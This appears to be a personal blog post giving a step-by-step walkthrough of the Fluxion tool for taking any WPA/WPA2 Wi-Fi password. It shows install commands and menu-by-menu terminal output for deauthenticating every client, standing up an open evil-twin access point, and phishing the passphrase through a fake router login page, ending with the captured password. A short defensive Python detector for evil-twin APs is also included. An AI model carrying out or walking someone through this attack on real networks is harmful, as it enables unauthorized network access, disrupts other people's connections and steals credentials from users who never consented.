theKingOfNight's Blog

Hacking-any-WPA/WPA2-PSK-without-BruteForce

2019/02/01

Fluxion is built on programs such as aircrack-ng, mdk3 and hostapd.

Files needed for the experiment

Prerequisites

After downloading:

┌─[thekingofnight@parrot]─[~/Desktop/test/test]
└──╼ $ls
add.py airmon arch-install fluxion Installer.sh LICENSE logos.zip README.md remove.py
┌─[thekingofnight@parrot]─[~/Desktop/test/test]
└──╼ $chmod 777 *
┌─[thekingofnight@parrot]─[~/Desktop/test/test]
└──╼ $apt-get update
┌─[✗]─[thekingofnight@parrot]─[~/Desktop/test/test]
└──╼ $sudo proxychains ./Installer.sh

Wait for the installation to finish. To confirm that it has completed, run Installer.sh again; the result looks like this:

#########################################################
# #
# FLUXION 2 < Fluxion Is The Future > #
# by Deltax, Strasharo and ApatheticEuphoria #
# #
#########################################################
Aircrack-ng.....OK!
Aireplay-ng.....OK!
Airodump-ng.....OK!
Bully...........OK!
Curl............OK!
Dhcpd...........OK!
Hostapd.........OK!
Iwconfig........OK!
Lighttpd........OK!
Macchanger......OK!
Mdk3............OK!
Nmap............OK!
Openssl.........OK!
Php-cgi........OK!
Pyrit...........OK!
Python..........OK!
Reaver..........OK!
rfkill..........OK!
Unzip...........OK!
Xterm...........OK!
Zenity..........OK!
strings..........OK!
fuser............OK!

./fluxion

Hands-on

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[i] Select your language
[1] English
[2] German
[3] Romanian
[4] Turkish
[5] Spanish
[6] Chinese
[7] Italian
[8] Czech
[9] Greek
[deltaxflux@fluxion]-[~]

This means it is running successfully. English is used as the example here.

[i] Select channel
[1] All channels
[2] Specific channel(s)
[3] Back
[deltaxflux@fluxion]-[~]1

Select 1

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
WIFI LIST
ID MAC CHAN SECU PWR ESSID
......
[37] 90:94:xx:xx:xx:xx 11 WPA2 65% theKingOfNight
......
(*) Active clients
Select target. For rescan type r

Select 37

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
INFO WIFI
SSID = theKingOfNight / WPA2
Channel = 11
Speed = 30 Mbps
BSSID = 90:94:97:xx:xx:xx ( )
[i] Select Attack Option
[1] FakeAP - Hostapd (Recommended)
[2] FakeAP - airbase-ng (Slower connection)
[3] WPS-SLAUGHTER - Bruteforce WPS Pin
[4] Bruteforce - (Handshake is required)
[5] Back

Select 1

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
INFO WIFI
SSID = theKingOfNight / WPA2
Channel = 11
Speed = 30 Mbps
BSSID = 90:94:97:xx:xx:xx ( )
handshake location (Example: /home/thekingofnight/Desktop/test/test.cap)
Press ENTER to skip
Path:

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[i] Handshake check
[1] aircrack-ng (Miss chance)
[2] pyrit
[3] Back
[deltaxflux@fluxion]-[~]1
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[i] *Capture Handshake*
[1] Deauth all
[2] Deauth all [mdk3]
[3] Deauth target
[4] Rescan networks
[5] Exit
[deltaxflux@fluxion]-[~]1

This disconnects all users from the Wi-Fi. By default their devices then reconnect automatically, which gives us a handshake packet.

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[i] *Capture Handshake*
Status handshake:
[1] Check handshake
[2] Back (Select another deauth method)
[3] Select another network
[4] Exit
#> 1

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[ ]
[ FLUXION 0.23 < Fluxion Is The Future > ]
[ by Deltax, Strasharo and ApatheticEuphoria ]
[ ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
INFO WIFI
SSID = theKingOfNight / WPA2
Channel = 11
Speed = 30 Mbps
BSSID = 90:94:97:xx:xx:xx ( )
[i] Select your option
[1] Web Interface
[2] Bruteforce
[3] Exit
#?1
[i] Select Login Page
[1] English [ENG] (NEUTRA)
[2] German [GER] (NEUTRA)
[3] Russian [RUS] (NEUTRA)
[4] Italian [IT] (NEUTRA)
[5] Spanish [ESP] (NEUTRA)
[6] Portuguese [POR] (NEUTRA)
[7] Chinese [CN] (NEUTRA)
[8] French [FR] (NEUTRA)
[9] Turkish [TR] (NEUTRA)
[10] Romanian [RO] (NEUTRA)
[11] Hungarian [HU] (NEUTRA)
[12] Arabic [ARA] (NEUTRA)
[13] Greek [GR] (NEUTRA)
[14] Czech [CZ] (NEUTRA)
[15] Norwegian [NO] (NEUTRA)
[16] Bulgarian [BG] (NEUTRA)
[17] Serbia [SRB] (NEUTRA)
[18] Polish [PL] (NEUTRA)
[19] Indonesia [ID] (NEUTRA)
[20] Dutch [NL] (NEUTRA)
[21] Danish [DAN] (NEUTRA)
[22] Hebrew [HE] (NEUTRA)
[23] Thailand [TH] (NEUTRA)
[24] Belkin [ENG]
[25] Netgear [ENG]
[26] Huawei [ENG]
[27] Verizon [ENG]
[28] Netgear [ESP]
[29] Arris [ESP]
[30] Vodafone [ESP]
[31] TP-Link [ENG]
[32] TP-Link [ITA]
[33] Back
#? 7

An open Wi-Fi hotspot with the same name now appears, and the previously encrypted one can no longer be connected to.

People with low security awareness will, by default, connect to the open hotspot with the same name.
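
From the defender's side, the condition described above (an open AP advertising the same SSID as a WPA2 network) can be checked for in periodic scan results. The following is an added example, not part of the original post or of Fluxion; the scan records, the baseline and the BSSIDs in it are constructed, and the function name is hypothetical.

```python
from collections import defaultdict

# Constructed baseline of what the protected network should look like (assumption).
BASELINE = {"theKingOfNight": {"security": "WPA2", "bssids": {"02:00:00:aa:bb:01"}}}

# Constructed scan records; BSSIDs are made-up locally administered addresses.
SCAN = [
    {"ssid": "theKingOfNight", "bssid": "02:00:00:aa:bb:01", "channel": 11, "security": "WPA2"},
    {"ssid": "theKingOfNight", "bssid": "02:00:00:cc:dd:99", "channel": 11, "security": "OPEN"},
    {"ssid": "GuestNet", "bssid": "02:00:00:aa:bb:02", "channel": 6, "security": "OPEN"},
]


def find_evil_twin_indicators(scan, baseline):
    """Return a sorted list of (ssid, bssid, reason) findings for one scan."""
    by_ssid = defaultdict(list)
    for ap in scan:
        by_ssid[ap["ssid"]].append(ap)

    findings = []
    for ssid, aps in by_ssid.items():
        encrypted_seen = any(ap["security"] != "OPEN" for ap in aps)
        known = baseline.get(ssid)
        for ap in aps:
            # Same SSID visible both encrypted and open in a single scan.
            if ap["security"] == "OPEN" and encrypted_seen:
                findings.append((ssid, ap["bssid"], "open AP shares SSID with encrypted AP"))
            # The baseline still catches the twin when the real AP is not visible.
            if known and ap["security"] != known["security"]:
                findings.append((ssid, ap["bssid"], "security differs from baseline"))
            if known and ap["bssid"] not in known["bssids"]:
                findings.append((ssid, ap["bssid"], "BSSID not in baseline"))
    return sorted(findings)


if __name__ == "__main__":
    for ssid, bssid, reason in find_evil_twin_indicators(SCAN, BASELINE):
        print(f"ALERT {ssid} {bssid}: {reason}")
```

On the client side, disabling auto-join for open networks and never typing a Wi-Fi passphrase into a web page removes the step this technique relies on.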

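At this point, a device connected to the network is redirected by default to a login page when it uses a browser or an app.

After the input is submitted, the page changes to a follow-up page.

It is similar on mobile.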

Finally

┌─[root@parrot]─[/home/thekingofnight/Desktop/test/test]
└──╼ #cat /root/theKingOfNight-password.txt
FLUX 0.23 by deltax
SSID: theKingOfNight
BSSID: 90:94:xx:xx:xx:xx ()
Channel: 11
Security: WPA2
Time: 00:15:16
Password: 1234567890

Some pitfalls

How to restore the network

┌─[✗]─[root@parrot]─[/home/thekingofnight]
└──╼ #ifconfig wlan0mon down
┌─[root@parrot]─[/home/thekingofnight]
└──╼ #iwconfig wlan0mon channel 11
┌─[root@parrot]─[/home/thekingofnight]
└──╼ #service network-manager start

Fix for Fluxion being unable to monitor

airmon-ng check kill
airmon-ng start wlan0

References

https://www.youtube.com/watch?v=gwF2mcbmfKQ&list=PLjo33Hih06ps2dlJMflCU7tYA7dzk_xYl&index=29
